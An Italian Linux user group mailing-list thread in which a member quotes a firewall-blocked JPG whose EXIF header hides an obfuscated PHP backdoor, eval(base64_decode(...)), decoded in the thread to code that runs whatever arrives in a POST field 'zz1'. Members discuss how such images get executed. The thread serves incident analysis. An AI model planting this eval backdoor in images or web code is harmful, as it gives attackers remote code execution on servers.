Re: [linux_var] VIRUS JPG con codice PHP ?

To: linux_var - LUG di Varese e Provincia Mailing List <talking@ml.linuxvar.it>

Subject: Re: [linux_var] VIRUS JPG con codice PHP ?

From: Giovanni Orlandi <orlangio@gmail.com>

Date: Wed, 11 Oct 2017 15:01:02 +0200

Authentication-results: linuxvar.it; dkim=pass reason="2048-bit key; unprotected key" header.d=gmail.com header.i=@gmail.com header.b=BdfEQeJ1; dkim-adsp=pass; dkim-atps=neutral

Delivered-to: diegor@tiscali.it

Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=ml.linuxvar.it; s=mail; t=1507726862; bh=1HhJnppTX6PSdcsm/7RoUyTWfG6Q36SeANCORZzeIlk=; h=In-Reply-To:References:From:Date:To:Subject:List-Id: List-Unsubscribe:List-Archive:List-Post:List-Help:List-Subscribe: Reply-To; z=In-Reply-To:=20<20171011120505.a8b821eb10ae869e3d57d4c7@gmx.co.uk >|References:=20<CAGod1SDqeFse-+WJmx3ooyEsH=3DSvYK_KB1KxVvSNOTFiUt vDAw@mail.gmail.com>=0D=0A=20<20171011120505.a8b821eb10ae869e3d57d 4c7@gmx.co.uk>|From:=20Giovanni=20Orlandi=20<orlangio@gmail.com>|D ate:=20Wed,=2011=20Oct=202017=2015:01:02=20+0200|To:=20linux_var=2 0-=20LUG=20di=20Varese=20e=20Provincia=20Mailing=20List=20<talking @ml.linuxvar.it>|Subject:=20Re:=20[linux_var]=20VIRUS=20JPG=20con= 20codice=20PHP=20?|List-Id:=20linux_var=20-=20LUG=20di=20Varese=20 e=20Provincia=20Mailing=20List=0D=0A=20<talking.ml.linuxvar.it>|Li st-Unsubscribe:=20<http://ml.linuxvar.it/cgi-bin/mailman/options/t alking>,=0D=0A=20<mailto:talking-request@ml.linuxvar.it?subject=3D unsubscribe>|List-Archive:=20<http://ml.linuxvar.it/pipermail/talk ing/>|List-Post:=20<mailto:talking@ml.linuxvar.it>|List-Help:=20<m ailto:talking-request@ml.linuxvar.it?subject=3Dhelp>|List-Subscrib e:=20<http://ml.linuxvar.it/cgi-bin/mailman/listinfo/talking>,=0D= 0A=20<mailto:talking-request@ml.linuxvar.it?subject=3Dsubscribe>|R eply-To:=20linux_var=20-=20LUG=20di=20Varese=20e=20Provincia=20Mai ling=20List=0D=0A=20<talking@ml.linuxvar.it>; b=CZn00n8JJvPzpVgFb4yOg6w31Fqcl4IBX/1bv8+/MXeFBu9yoPhSAVAi/gpX81jV9 tCTtigKShtFlLVdLDKhiDq9TQKS0Yna03ZMYubfKAeKeMq/kDYDcRgm4gRTbX0q/9h jrRsu4bsvt4XOJH0AvRvL131noD3B2rx9RAIHtLw=

Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20161025; h=mime-version:in-reply-to:references:from:date:message-id:subject:to; bh=0eVya8TOIIP1DPaxoWAhCqdiXHdXYluSMwgrIE05rz0=; b=BdfEQeJ1TaEuX4dWSXnEIZmge2unMKw5Dr7KY8gZq8JyOMzjXr3lZViZAy0Bu9tdNN 1jeZ7YsLsPUkM0KTsK+Yvs2Z2pubKpYgfQEZq6m67+EY5R3SCcqF7d32mRn9JCA4TD51 kknrOF0/kbvvFR+MBYnxGbU5KkskqU4+xqFm+aw8DuXa6fu4z0++lRbQNYCYuzfKhmcJ V0bCIfUI10tdiol6u/OtGhk8jfSfBvfgca6PEv1a0i1O3LdILEZ3zFr+jiJnIQi3iA1b YZ43hzwapsvquyUJ/8s2OoE4sIDZigYa9gY1zJfK3ZTTggoL7q512nx1kMfTnB11cY3A ++sg==

In-reply-to: <20171011120505.a8b821eb10ae869e3d57d4c7@gmx.co.uk>

List-archive: <http://ml.linuxvar.it/pipermail/talking/>

List-help: <mailto:talking-request@ml.linuxvar.it?subject=help>

List-id: linux_var - LUG di Varese e Provincia Mailing List <talking.ml.linuxvar.it>

List-post: <mailto:talking@ml.linuxvar.it>

List-subscribe: <http://ml.linuxvar.it/cgi-bin/mailman/listinfo/talking>, <mailto:talking-request@ml.linuxvar.it?subject=subscribe>

List-unsubscribe: <http://ml.linuxvar.it/cgi-bin/mailman/options/talking>, <mailto:talking-request@ml.linuxvar.it?subject=unsubscribe>

References: <CAGod1SDqeFse-+WJmx3ooyEsH=SvYK_KB1KxVvSNOTFiUtvDAw@mail.gmail.com> <20171011120505.a8b821eb10ae869e3d57d4c7@gmx.co.uk>

Reply-to: linux_var - LUG di Varese e Provincia Mailing List <talking@ml.linuxvar.it>

Sender: "Talking" <talking-bounces@ml.linuxvar.it>

forse ho trovato il buco...

ci sono delle gallerie di immagini php che sono scritte talmente male da rendere possibile eseguire codice php presente nei meta-tag delle immagini jpg...

https://null-byte.wonderhowto.com/forum/hide-php-virus-jpeg-image-0175597/

Gio

Il giorno 11 ottobre 2017 12:05, Riccardo Macoratti <r.macoratti@gmx.co.uk> ha scritto:

Ciao,

magari è parte dell'exploit per l'esecuzione di qualche shellcode.
Mi spiego meglio, magari è stata scoperta qualche vulnerabilità in Apache che facendo l'upload di qualche immagine si può sbordare in qualche buffer ed eseguire codice arbitrario.

È solo una supposizione, però.

Ciao,
Riccardo

On Wed, 11 Oct 2017 11:51:25 +0200
Giovanni Orlandi <orlangio@gmail.com> wrote:

> Ciao,
>
> analizzando i log del firewall aziendale ho trovato bloccato il download
> sul PC
> di una immagine jpg (fortunatamente da un server esterno)
>
> AntiVirus
> Profile Name default
> Virus/Botnet PHP/Agent.VD!tr.bdr
> <http://www.fortinet.com/ve?vn=PHP%2FAgent.VD%21tr.bdr>
> Virus ID 5380326
> Reference http://www.fortinet.com/ve?vn=PHP%2FAgent.VD%21tr.bdr
> Detection Type Virus
> Direction incoming
> Quarantine Skip File-was-not-quarantined.
> FortiSandbox Checksum
> 1552666804a9e84d3da6741fdf81d7b20206b15d46fd3e73fd9e51c6e822e706
> Submitted to FortiSandbox false
> Message File is infected.
>
> Questo è il contenuto iniziale della jpg aperta in modo brutale con vim:
>
> ÿØÿà^@^PJFIF^@^A^A^A^@H^@H^@^@ÿá^@¡Exif^@^@II*^@^H^@^@^@^B^@^O^A^B^@^F^@^@^@&^@^@^@^P^A^B^@m^@^@^@,^@^@^@^@^@^@^@/.*/e
> ^@eval(base64_decode('aWYgKGlzc2V0KCRfUE9TVFsienoxIl0pKSB7ZXZhbChzdHJpcHNsYXNoZXMoJF9QT1NUWyJ6ejEiXSkpO30='));^@ÿÛ^@C^@^E^C^D^D^D^C^E^D^D
>
> il base64_decode diventa:
>
> * if (isset($_POST["zz1"])) {eval(stripslashes($_POST["zz1"]));}*

>
> senz'altro pericoloso se dentro un file php sul server
> ma dentro una jpg ?
>
> Non mi pare che lo scarico di quella immagine su di un PC (windows) possa
> portare alcun pericolo,
> semmai il suo upload su di un server, che però dovrebbe "eseguire" del
> codice php dentro una immagine jpg ?!?!?!
>
> Qualcuno conosce il problema e mi può dare + informazioni ?
> Grazie,
> Giovanni
>
> --
> -----------------------------------------------------------------------------------------
> Luca 18,5 : "Poiché questa vedova è così molesta le farò giustizia, perché
> non venga continuamente a importunarmi".
> Neemia 8,10 : "...questo giorno è consacrato al nostro Signore; non siate
> tristi; perché la gioia del Signore è la vostra forza".
> GSM 345.6050488 / 327.0547392 / 392.0698126 - Fax 06.62204735

--
Riccardo Macoratti
site: http://ricma.co
email: r {dot} macoratti {at} gmx {dot} co {dot} uk
_______________________________________________
Talking mailing list
Talking@ml.linuxvar.it
http://ml.linuxvar.it/cgi-bin/mailman/listinfo/talking

-----------------------------------------------------------------------------------------
Luca 18,5 : "Poiché questa vedova è così molesta le farò giustizia, perché non venga continuamente a importunarmi".
Neemia 8,10 : "...questo giorno è consacrato al nostro Signore; non siate tristi; perché la gioia del Signore è la vostra forza".
GSM 345.6050488 / 327.0547392 / 392.0698126 - Fax 06.62204735

_______________________________________________ Talking mailing list Talking@ml.linuxvar.it http://ml.linuxvar.it/cgi-bin/mailman/listinfo/talking

Follow-Ups:

Re: [linux_var] VIRUS JPG con codice PHP ?
- From: Giovanni Orlandi <orlangio@gmail.com>

References:

[linux_var] VIRUS JPG con codice PHP ?
- From: Giovanni Orlandi <orlangio@gmail.com>
Re: [linux_var] VIRUS JPG con codice PHP ?
- From: Riccardo Macoratti <r.macoratti@gmx.co.uk>